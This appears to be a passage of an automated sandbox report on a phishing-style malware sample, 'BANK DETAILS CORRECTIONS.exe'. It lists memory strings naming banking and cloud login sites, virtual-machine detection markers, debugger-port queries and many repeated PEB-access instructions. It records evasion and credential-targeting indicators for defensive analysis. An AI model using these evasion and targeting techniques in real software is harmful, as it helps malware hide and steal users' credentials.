                Source: sdiagnhost.exe, 00000015.00000002.3732172786.0000000002696000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: DC886F4.21.dr Binary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: DC886F4.21.dr Binary or memory string: outlook.office.comVMware20,11696501413s
                Source: DC886F4.21.dr Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1303137425.0000000007540000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: DC886F4.21.dr Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: DC886F4.21.dr Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: DC886F4.21.dr Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: DC886F4.21.dr Binary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: DC886F4.21.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: DC886F4.21.dr Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: DC886F4.21.dr Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: DC886F4.21.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: DC886F4.21.dr Binary or memory string: global block list test formVMware20,11696501413
                Source: DC886F4.21.dr Binary or memory string: outlook.office365.comVMware20,11696501413t
                Source: EnKifmZDGZ.exe, 00000019.00000002.3733293559.000000000105F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                Source: DC886F4.21.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: DC886F4.21.dr Binary or memory string: interactiveuserers.comVMware20,11696501413
                Source: DC886F4.21.dr Binary or memory string: discord.comVMware20,11696501413f
                Source: DC886F4.21.dr Binary or memory string: AMC password management pageVMware20,11696501413
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Process queried: DebugPort
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\sdiagnhost.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_0196096E rdtsc 12_2_0196096E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_00418C03 LdrLoadDll, 12_2_00418C03
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe Code function: 12_2_019A019F mov eax, dword ptr fs:[00000030h] 12_2_019A019F
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0274 mov eax, dword ptr fs:[00000030h]12_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0274 mov eax, dword ptr fs:[00000030h]12_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D0274 mov eax, dword ptr fs:[00000030h]12_2_019D0274
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01924260 mov eax, dword ptr fs:[00000030h]12_2_01924260
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01924260 mov eax, dword ptr fs:[00000030h]12_2_01924260
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01924260 mov eax, dword ptr fs:[00000030h]12_2_01924260
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191826B mov eax, dword ptr fs:[00000030h]12_2_0191826B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E59C mov eax, dword ptr fs:[00000030h]12_2_0195E59C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01922582 mov eax, dword ptr fs:[00000030h]12_2_01922582
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01922582 mov ecx, dword ptr fs:[00000030h]12_2_01922582
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01954588 mov eax, dword ptr fs:[00000030h]12_2_01954588
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019445B1 mov eax, dword ptr fs:[00000030h]12_2_019445B1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019445B1 mov eax, dword ptr fs:[00000030h]12_2_019445B1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A05A7 mov eax, dword ptr fs:[00000030h]12_2_019A05A7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A05A7 mov eax, dword ptr fs:[00000030h]12_2_019A05A7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A05A7 mov eax, dword ptr fs:[00000030h]12_2_019A05A7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019265D0 mov eax, dword ptr fs:[00000030h]12_2_019265D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195A5D0 mov eax, dword ptr fs:[00000030h]12_2_0195A5D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195A5D0 mov eax, dword ptr fs:[00000030h]12_2_0195A5D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E5CF mov eax, dword ptr fs:[00000030h]12_2_0195E5CF
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E5CF mov eax, dword ptr fs:[00000030h]12_2_0195E5CF
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019225E0 mov eax, dword ptr fs:[00000030h]12_2_019225E0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194E5E7 mov eax, dword ptr fs:[00000030h]12_2_0194E5E7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194E5E7 mov eax, dword ptr fs:[00000030h]12_2_0194E5E7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194E5E7 mov eax, dword ptr fs:[00000030h]12_2_0194E5E7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194E5E7 mov eax, dword ptr fs:[00000030h]12_2_0194E5E7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194E5E7 mov eax, dword ptr fs:[00000030h]12_2_0194E5E7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194E5E7 mov eax, dword ptr fs:[00000030h]12_2_0194E5E7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194E5E7 mov eax, dword ptr fs:[00000030h]12_2_0194E5E7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194E5E7 mov eax, dword ptr fs:[00000030h]12_2_0194E5E7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195C5ED mov eax, dword ptr fs:[00000030h]12_2_0195C5ED
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195C5ED mov eax, dword ptr fs:[00000030h]12_2_0195C5ED
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019B6500 mov eax, dword ptr fs:[00000030h]12_2_019B6500
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019F4500 mov eax, dword ptr fs:[00000030h]12_2_019F4500
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019F4500 mov eax, dword ptr fs:[00000030h]12_2_019F4500
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019F4500 mov eax, dword ptr fs:[00000030h]12_2_019F4500
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019F4500 mov eax, dword ptr fs:[00000030h]12_2_019F4500
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019F4500 mov eax, dword ptr fs:[00000030h]12_2_019F4500
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019F4500 mov eax, dword ptr fs:[00000030h]12_2_019F4500
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019F4500 mov eax, dword ptr fs:[00000030h]12_2_019F4500
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930535 mov eax, dword ptr fs:[00000030h]12_2_01930535
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930535 mov eax, dword ptr fs:[00000030h]12_2_01930535
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930535 mov eax, dword ptr fs:[00000030h]12_2_01930535
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930535 mov eax, dword ptr fs:[00000030h]12_2_01930535
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930535 mov eax, dword ptr fs:[00000030h]12_2_01930535
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930535 mov eax, dword ptr fs:[00000030h]12_2_01930535
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194E53E mov eax, dword ptr fs:[00000030h]12_2_0194E53E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194E53E mov eax, dword ptr fs:[00000030h]12_2_0194E53E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194E53E mov eax, dword ptr fs:[00000030h]12_2_0194E53E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194E53E mov eax, dword ptr fs:[00000030h]12_2_0194E53E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194E53E mov eax, dword ptr fs:[00000030h]12_2_0194E53E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01928550 mov eax, dword ptr fs:[00000030h]12_2_01928550
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01928550 mov eax, dword ptr fs:[00000030h]12_2_01928550
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195656A mov eax, dword ptr fs:[00000030h]12_2_0195656A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195656A mov eax, dword ptr fs:[00000030h]12_2_0195656A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195656A mov eax, dword ptr fs:[00000030h]12_2_0195656A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019DA49A mov eax, dword ptr fs:[00000030h]12_2_019DA49A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019544B0 mov ecx, dword ptr fs:[00000030h]12_2_019544B0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019AA4B0 mov eax, dword ptr fs:[00000030h]12_2_019AA4B0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019264AB mov eax, dword ptr fs:[00000030h]12_2_019264AB
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019204E5 mov ecx, dword ptr fs:[00000030h]12_2_019204E5
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01958402 mov eax, dword ptr fs:[00000030h]12_2_01958402
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01958402 mov eax, dword ptr fs:[00000030h]12_2_01958402
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01958402 mov eax, dword ptr fs:[00000030h]12_2_01958402
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195A430 mov eax, dword ptr fs:[00000030h]12_2_0195A430
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191E420 mov eax, dword ptr fs:[00000030h]12_2_0191E420
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191E420 mov eax, dword ptr fs:[00000030h]12_2_0191E420
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191E420 mov eax, dword ptr fs:[00000030h]12_2_0191E420
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191C427 mov eax, dword ptr fs:[00000030h]12_2_0191C427
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A6420 mov eax, dword ptr fs:[00000030h]12_2_019A6420
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A6420 mov eax, dword ptr fs:[00000030h]12_2_019A6420
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A6420 mov eax, dword ptr fs:[00000030h]12_2_019A6420
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A6420 mov eax, dword ptr fs:[00000030h]12_2_019A6420
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A6420 mov eax, dword ptr fs:[00000030h]12_2_019A6420
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A6420 mov eax, dword ptr fs:[00000030h]12_2_019A6420
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A6420 mov eax, dword ptr fs:[00000030h]12_2_019A6420
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019DA456 mov eax, dword ptr fs:[00000030h]12_2_019DA456
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0191645D mov eax, dword ptr fs:[00000030h]12_2_0191645D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194245A mov eax, dword ptr fs:[00000030h]12_2_0194245A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E443 mov eax, dword ptr fs:[00000030h]12_2_0195E443
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E443 mov eax, dword ptr fs:[00000030h]12_2_0195E443
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E443 mov eax, dword ptr fs:[00000030h]12_2_0195E443
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E443 mov eax, dword ptr fs:[00000030h]12_2_0195E443
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E443 mov eax, dword ptr fs:[00000030h]12_2_0195E443
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E443 mov eax, dword ptr fs:[00000030h]12_2_0195E443
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E443 mov eax, dword ptr fs:[00000030h]12_2_0195E443
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195E443 mov eax, dword ptr fs:[00000030h]12_2_0195E443
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194A470 mov eax, dword ptr fs:[00000030h]12_2_0194A470
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194A470 mov eax, dword ptr fs:[00000030h]12_2_0194A470
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0194A470 mov eax, dword ptr fs:[00000030h]12_2_0194A470
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019AC460 mov ecx, dword ptr fs:[00000030h]12_2_019AC460
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019C678E mov eax, dword ptr fs:[00000030h]12_2_019C678E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019207AF mov eax, dword ptr fs:[00000030h]12_2_019207AF
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019D47A0 mov eax, dword ptr fs:[00000030h]12_2_019D47A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192C7C0 mov eax, dword ptr fs:[00000030h]12_2_0192C7C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A07C3 mov eax, dword ptr fs:[00000030h]12_2_019A07C3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019247FB mov eax, dword ptr fs:[00000030h]12_2_019247FB
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019247FB mov eax, dword ptr fs:[00000030h]12_2_019247FB
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019427ED mov eax, dword ptr fs:[00000030h]12_2_019427ED
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019427ED mov eax, dword ptr fs:[00000030h]12_2_019427ED
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019427ED mov eax, dword ptr fs:[00000030h]12_2_019427ED
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019AE7E1 mov eax, dword ptr fs:[00000030h]12_2_019AE7E1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01920710 mov eax, dword ptr fs:[00000030h]12_2_01920710
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01950710 mov eax, dword ptr fs:[00000030h]12_2_01950710
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195C700 mov eax, dword ptr fs:[00000030h]12_2_0195C700
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195273C mov eax, dword ptr fs:[00000030h]12_2_0195273C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195273C mov ecx, dword ptr fs:[00000030h]12_2_0195273C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195273C mov eax, dword ptr fs:[00000030h]12_2_0195273C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199C730 mov eax, dword ptr fs:[00000030h]12_2_0199C730
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195C720 mov eax, dword ptr fs:[00000030h]12_2_0195C720
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195C720 mov eax, dword ptr fs:[00000030h]12_2_0195C720
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01920750 mov eax, dword ptr fs:[00000030h]12_2_01920750
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962750 mov eax, dword ptr fs:[00000030h]12_2_01962750
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962750 mov eax, dword ptr fs:[00000030h]12_2_01962750
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019AE75D mov eax, dword ptr fs:[00000030h]12_2_019AE75D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A4755 mov eax, dword ptr fs:[00000030h]12_2_019A4755
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195674D mov esi, dword ptr fs:[00000030h]12_2_0195674D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195674D mov eax, dword ptr fs:[00000030h]12_2_0195674D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195674D mov eax, dword ptr fs:[00000030h]12_2_0195674D
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01928770 mov eax, dword ptr fs:[00000030h]12_2_01928770
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930770 mov eax, dword ptr fs:[00000030h]12_2_01930770
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930770 mov eax, dword ptr fs:[00000030h]12_2_01930770
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930770 mov eax, dword ptr fs:[00000030h]12_2_01930770
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930770 mov eax, dword ptr fs:[00000030h]12_2_01930770
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930770 mov eax, dword ptr fs:[00000030h]12_2_01930770
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930770 mov eax, dword ptr fs:[00000030h]12_2_01930770
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930770 mov eax, dword ptr fs:[00000030h]12_2_01930770
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930770 mov eax, dword ptr fs:[00000030h]12_2_01930770
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930770 mov eax, dword ptr fs:[00000030h]12_2_01930770
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930770 mov eax, dword ptr fs:[00000030h]12_2_01930770
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930770 mov eax, dword ptr fs:[00000030h]12_2_01930770
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01930770 mov eax, dword ptr fs:[00000030h]12_2_01930770
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01924690 mov eax, dword ptr fs:[00000030h]12_2_01924690
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01924690 mov eax, dword ptr fs:[00000030h]12_2_01924690
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019566B0 mov eax, dword ptr fs:[00000030h]12_2_019566B0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195C6A6 mov eax, dword ptr fs:[00000030h]12_2_0195C6A6
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195A6C7 mov ebx, dword ptr fs:[00000030h]12_2_0195A6C7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195A6C7 mov eax, dword ptr fs:[00000030h]12_2_0195A6C7
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199E6F2 mov eax, dword ptr fs:[00000030h]12_2_0199E6F2
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199E6F2 mov eax, dword ptr fs:[00000030h]12_2_0199E6F2
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199E6F2 mov eax, dword ptr fs:[00000030h]12_2_0199E6F2
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199E6F2 mov eax, dword ptr fs:[00000030h]12_2_0199E6F2
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A06F1 mov eax, dword ptr fs:[00000030h]12_2_019A06F1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A06F1 mov eax, dword ptr fs:[00000030h]12_2_019A06F1
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962619 mov eax, dword ptr fs:[00000030h]12_2_01962619
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0199E609 mov eax, dword ptr fs:[00000030h]12_2_0199E609
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193260B mov eax, dword ptr fs:[00000030h]12_2_0193260B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193260B mov eax, dword ptr fs:[00000030h]12_2_0193260B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193260B mov eax, dword ptr fs:[00000030h]12_2_0193260B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193260B mov eax, dword ptr fs:[00000030h]12_2_0193260B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193260B mov eax, dword ptr fs:[00000030h]12_2_0193260B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193260B mov eax, dword ptr fs:[00000030h]12_2_0193260B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193260B mov eax, dword ptr fs:[00000030h]12_2_0193260B
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193E627 mov eax, dword ptr fs:[00000030h]12_2_0193E627
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01956620 mov eax, dword ptr fs:[00000030h]12_2_01956620
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01958620 mov eax, dword ptr fs:[00000030h]12_2_01958620
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192262C mov eax, dword ptr fs:[00000030h]12_2_0192262C
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0193C640 mov eax, dword ptr fs:[00000030h]12_2_0193C640
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01952674 mov eax, dword ptr fs:[00000030h]12_2_01952674
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E866E mov eax, dword ptr fs:[00000030h]12_2_019E866E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019E866E mov eax, dword ptr fs:[00000030h]12_2_019E866E
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195A660 mov eax, dword ptr fs:[00000030h]12_2_0195A660
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0195A660 mov eax, dword ptr fs:[00000030h]12_2_0195A660
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A89B3 mov esi, dword ptr fs:[00000030h]12_2_019A89B3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A89B3 mov eax, dword ptr fs:[00000030h]12_2_019A89B3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019A89B3 mov eax, dword ptr fs:[00000030h]12_2_019A89B3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h]12_2_019329A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h]12_2_019329A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h]12_2_019329A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h]12_2_019329A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h]12_2_019329A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h]12_2_019329A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h]12_2_019329A0
